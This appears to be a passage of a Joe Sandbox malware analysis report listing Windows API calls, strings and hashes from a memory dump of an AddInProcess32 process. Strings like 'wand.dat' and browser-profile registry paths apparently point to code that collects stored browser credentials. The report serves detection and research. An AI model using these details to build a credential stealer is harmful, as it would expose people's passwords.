                                                                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                    • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                  • memset.MSVCRT ref: 0040C439
                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                  • memset.MSVCRT ref: 0040C4D0
                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                  • String ID:
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004116FF
                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFilefreememset
                                                                                                  • String ID:
                                                                                                  APIs
                                                                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                  • malloc.MSVCRT ref: 00417524
                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                  • free.MSVCRT ref: 00417544
                                                                                                  • free.MSVCRT ref: 00417562
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                  • String ID:
                                                                                                  APIs
                                                                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                  • free.MSVCRT ref: 0041822B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PathTemp$free
                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                  APIs
                                                                                                  • wcscpy.MSVCRT ref: 0041477F
                                                                                                  • wcscpy.MSVCRT ref: 0041479A
                                                                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                                                                  • String ID: General
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                                  • String ID: Error$Error %d: %s
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: foreign key constraint failed$new$oid$old
                                                                                                  Strings
                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy
                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0044A6EB
                                                                                                  • memset.MSVCRT ref: 0044A6FB
                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpymemset
                                                                                                  • String ID: gj
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                  • free.MSVCRT ref: 0040E9D3
                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@$free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2241099983-0
                                                                                                  APIs
                                                                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                  • malloc.MSVCRT ref: 004174BD
                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                  • free.MSVCRT ref: 004174E4
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 4053608372-0
                                                                                                  APIs
                                                                                                  • GetParent.USER32(?), ref: 0040D453
                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                  Similarity
                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                  • String ID:
                                                                                                  • API String ID: 4247780290-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                  Similarity
                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1471605966-0
                                                                                                  APIs
                                                                                                  • wcscpy.MSVCRT ref: 0044475F
                                                                                                  • wcscat.MSVCRT ref: 0044476E
                                                                                                  • wcscat.MSVCRT ref: 0044477F
                                                                                                  • wcscat.MSVCRT ref: 0044478E
                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                  Similarity
                                                                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                  • String ID: \StringFileInfo\
                                                                                                  • API String ID: 102104167-2245444037
                                                                                                  APIs
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                  Similarity
                                                                                                  • API ID: ??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 613200358-0
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                                  • memset.MSVCRT ref: 00410112
                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                  • String ID: </%s>
                                                                                                  • API String ID: 3400436232-259020660
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040D58D
                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                  Similarity
                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                  • String ID: caption
                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                  APIs
                                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                  Similarity
                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                  • String ID: MS Sans Serif
                                                                                                  • API String ID: 210187428-168460110
                                                                                                  APIs
                                                                                                  • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                  • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                  • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$memcmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 3384217055-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: memset$memcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 368790112-0
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040560C
                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                  • String ID: *.*$dat$wand.dat
                                                                                                  • API String ID: 2618321458-1828844352
                                                                                                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00412057
                                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3550944819-0
                                                                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                  APIs
                                                                                                  • free.MSVCRT ref: 0040F561
                                                                                                  • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$free
                                                                                                  • String ID: g4@
                                                                                                  • API String ID: 2888793982-2133833424
                                                                                                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                  APIs
                                                                                                  • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                  • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                  • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy
                                                                                                  • String ID: @
                                                                                                  • API String ID: 3510742995-2766056989
                                                                                                  • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                  • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                  • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                  • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004144E7
                                                                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                    • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                  • memset.MSVCRT ref: 0041451A
                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 1127616056-0
                                                                                                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                  APIs
                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                  • malloc.MSVCRT ref: 00417459
                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                  • free.MSVCRT ref: 0041747F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2605342592-0
                                                                                                  • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                  • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                  • RegisterClassW.USER32(?), ref: 00412428
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2678498856-0
                                                                                                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040F673
                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                  • strlen.MSVCRT ref: 0040F6A2
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2754987064-0
                                                                                                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040F6E2
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                  • strlen.MSVCRT ref: 0040F70D
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                  Memory Dump Source
